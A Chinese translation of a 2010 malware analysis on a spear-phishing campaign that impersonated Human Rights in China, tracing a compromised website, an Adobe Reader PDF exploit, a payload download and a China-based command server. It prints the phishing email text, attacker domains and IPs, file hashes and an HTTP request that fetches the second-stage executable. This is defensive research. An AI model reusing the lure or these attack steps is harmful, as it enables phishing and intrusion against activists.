Nart Villeneuve:人权与恶意软件攻击

作者:纳尔特・维伦纽夫  来源:中国人权

由中国人权翻译

2010年3月18日,一个匿名的网络攻击者发出了一封“鱼叉式钓鱼” 邮件,看上去像是中国人权执行主任谭竞嫦群发给各个组织和个人的。攻击者的邮件藉着中国人权的信誉,怂恿收件者去访问一个已被攻占且带有恶意代码的网站。 这种代码是设计来让攻击者最终完全控制访问者的电脑的。现在,这些有针对性的恶意软件攻击已十分普遍,进一步扩大了民间组织所面临的威胁。

介绍

互联网审查只是“社会控制系统”中的一部分,用以限制和控制信息在中国的流动。审查与监视两者的结合,目的在於对自我审查行为产生影响,从而使大部 分人不会主动去寻找被禁的信息,更不用说去寻找避开控制的办法了。而那些政治活跃人士和公开反对审查等打压政策的人就不仅仅是被审查,还有可能遭受到各种 各样的威胁。

2008年, 一份题为《侵犯信任: 对中国Tom-Skype平台实行的监视和安全实践的分析》(Breaching Trust: An Analysis of Surveillance and Security Practices on China’s TOM-Skype Platform) 的报告,揭露了Skype与其中国夥伴北京雷霆万钧网络科技(Tom Online)所运作的监视网络。该网络以不安全的方式储存了数百万条记录,包括任何文字聊天、网络电话以及敏感聊天信息在内的交往细节。这些被储存信息 中很大部分内容与呼吁中国公民退出共产党的政治运动有关。

目前,针对民间组织、人权团体、媒体机构和西藏支持者的恶意软件攻击事件的数量一直在增加。通常情况下,成为攻击目标的用户会收到一封电子邮件,看 上去很像是他们组织里所熟悉的某个人发出的,邮件内还有一些文字,内容有时具体有时笼统,要求用户打开一个附件(或访问一个网站),通常是一个PDF或 Microsoft Office的文档。

如果用户使用带有安全漏洞的Adobe Reader或Microsoft Office(其它软件也有被攻击者利用的)去打开这个附件,而其电脑中又没有反病毒软件,他们的电脑很可能会被劫持。通常情况下,一个被嵌入恶意文件的 正常文本,在攻击成功后会自动开启,因此,收件人不会产生怀疑。

用户的电脑被攻克后,就会向攻击者的指令控制服务器报告。这时攻击者就完全控制了用户的系统。攻击者能窃取文件、电邮,输送数据,或迫使其下载更多恶意软件,还可能利用被控制的电脑作为工具,进一步利用受害者的联络信息或其它目标网络中的计算机。

在过去的一年 里,“信息战观察员”(Information Warfare Monitor)已发现了两个电脑间谍网络,调查了许多有针对性的恶意软件攻击,并发表了两份报告:《跟踪幽灵网:网络间谍系统调查》(Tracking GhostNet: Investigating a Cyber Espionage Network)和《云中阴影:电脑间谍2.0调查》(Shadows in the Cloud: An Investigation into Cyber Espionage 2.0)。

第一份报告中的“幽灵网”,是一个分布在103个国家的1200多部被攻克电脑的网络。我们发现并确定其中的30%是“高价值”目标,包括外交部、 大使馆、国际组织、新闻机构,以及一部位於北约总部的电脑。尽管我们可以确定这些机构已经被攻克,但我们只能推断攻击者所能够获取的数据。我们的跟进调查 还发现了“影子网络”。

与幽灵网不同,我们能够获得被攻击者窃取的数据。我们能够进入影子网络的一部分,那部分的重点是从印度提取敏感信息。我们复原了各种各样的文件,其 中包括一封加密的外交信函,两份标有“秘密”的文件,六份“限阅”文件和五份“机密”文件,这些文件看来是属於印度政府机构,包括印度国家安全委员会秘书 处、印度驻喀布尔大使馆、印度驻莫斯科大使馆、印度驻迪拜总领事馆,以及印度驻尼日利亚阿布贾的高级委员会。我们还复原了一些文件,包括达赖喇嘛办公室於 2009年1月至11月间发送的1500封信。

从被攻击的组织机构和攻击者所窃取数据的性质来看,确实显示了与中华人民共和国的战略利益有关,但我们不能确定这些攻击者与中国国家机构有任何直接联系。

调查

概述

2010年3月18日,一个匿名攻击者发出了一封“鱼叉式钓鱼”电邮,看上去像是中国人权执行主任谭竞嫦群发给各个组织和个人的。电邮的题目是“微 软,警察和联邦调查局的密探”,电邮附了一个JPG格式的文件,攻击者的目标是要收件者去访问电邮中含有的一个链接。这个链接 www.cfcr2008.org将收件者导向另一网站cfcr.i1024.com,而这个网站已经被攻击者攻克并植入了代码,代码会使访问网站者打开 www.520520.com.tw的一个恶意PDF格式文件。该文件利用Adobe Reader的安全漏洞去攻克访问者的电脑。被攻克的电脑会被连接到一个受攻击者控制的网站www.humanright-watch.org,下载更多 的恶意软件,然后最终被连接到攻击者设在中国的指令控制服务器360liveupdate.com

假冒的电邮

发件人: 谭竞嫦(Sharon Hom <mailto:sharon.hom@hrichina.org>)
收件人: [略]
发送时间:2010年3月18日,星期四,上午9点46分
题目: 微软,警察和联调局的密探

我得到了一份被�露的微软机密文件《全球刑事遵守手册》的副本。文件为警察和情报机构详细解释了微软从其网络客户那里�集什么样的信息,以及怎样进 入。已经被�集和可能被�集的个人信息相当全面,包括你的电子邮件、登录和使用服务的信息、你的信用卡信息等详细资料。附件是该文件的扫描复印件。

欲获得完整文件,请访问http://www.cfcr2008.org

电子邮件的收发信息栏

这封电子邮件虽然看似发自中国人权,但实际上却是从下面电邮地址发出的:

Sender: selina@avghost.net <mailto:selina@avghost.net>
Received
: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]

 

这封电子邮件的标题,透露了攻击者实际上是从以下IP地址发送这一邮件的:

208.77.45.130
OrgName: DCS Pacific Star, LLC
OrgID: DCSPA
Address
: 5050 El Camino Real, #238
City: Los Altos
StateProv: CA
PostalCode
: 94022
Country: US

这封邮件怂恿收件人去访问名为“公民权利联盟”(Coalition for Citizen's Rights)组织的网站cfcr2008.org。这是一个经常发出反对中国政府声音的组织。攻击者攻克了这一网站,植入了恶意代码,导致有安全漏洞的 访问者无意中下载了能导致电脑感染恶意软件的PDF文档。见表1、表2。

表1 被攻克网站: cfcr2008.org -> cfcr.i1024.com

表2 js_men.asp

这一恶意PDF格式文件被存放在一个台湾的网站www.520520.com.tw (203.69.42.41)。反病毒软件对该恶意文件的识别率很低。42个反病毒软件产品中仅有8个能侦查出其为恶意软件。见表3。

表3

Filename readme.pdf
Filetype PDF
CVE ?
MD5 72bdca7dd12ed04b21dfa60c5c2ab6c4

Virustotal: 8/42 (19.05%)
http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11addfa9b4c5a1bb9247243a443a4b1-1269343609

http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7dfe&t=1269304734&type=js

这一恶意PDF格式文件含有的恶意软件给出了另一个链接,这次是www.humanright-watch.org (204.16.193.39)。这是一个受攻击者控制的服务器。恶意软件向另一个执行文件发出指令。这一执行文件看起来是加密的,反病毒产品无法测出其 为恶意软件。见表4。

表4

GET /fun.exe HTTP/1.1
Host: www.humanright-watch.org

Filename fun.exe
Filetype EXE
CVE ?
MD5 ec16143a14c091100e7af30de03fce1f

Virustotal: 0/42 (0%)
http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772dfbb2b7d2aa0425b5f8e03b2f1f-1269343660

有趣的是,www.humanright-watch.org (204.16.193.39)的IP地址和被用於发送恶意邮件的IP地址(208.77.45.130)都分配给了同一家公司——DCSPacific Star, LLC。

www.humanright-watch.org (204.16.193.39)上下载的新的恶意软件,开始与位於中国的360liveupdate.com网站 (117.85.48.157) 的指令控制服务器进行加密通讯联络。见表5。

表5

这一指令控制服务器位於中国江苏省:

117.85.48.157
inetnum
: 117.80.0.0 - 117.95.255.255
netname
: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr
: Beijing 100088
country
: CN

结论

审查、监视和恶意软件攻击三者并举,使中国有可能实行更加严厉的信息控制政策,并超越国界,影响到世界其它民间组织。目前,有关针对民间组织的恶意 软件攻击的报导越来越多。在许多案例中,这种攻击行为可以追踪到位於中国的指令控制基地。这些攻击凭藉社会和政治网络内部成员相互间的信任,利用人权主题 和假冒的身份,怂恿目标用户去执行恶意代码的指令。这样,匿名攻击者就完全控制了用户的电脑,并能从事监视、提取敏感信息和利用该电脑做为未来攻击的基 地。

没有评论: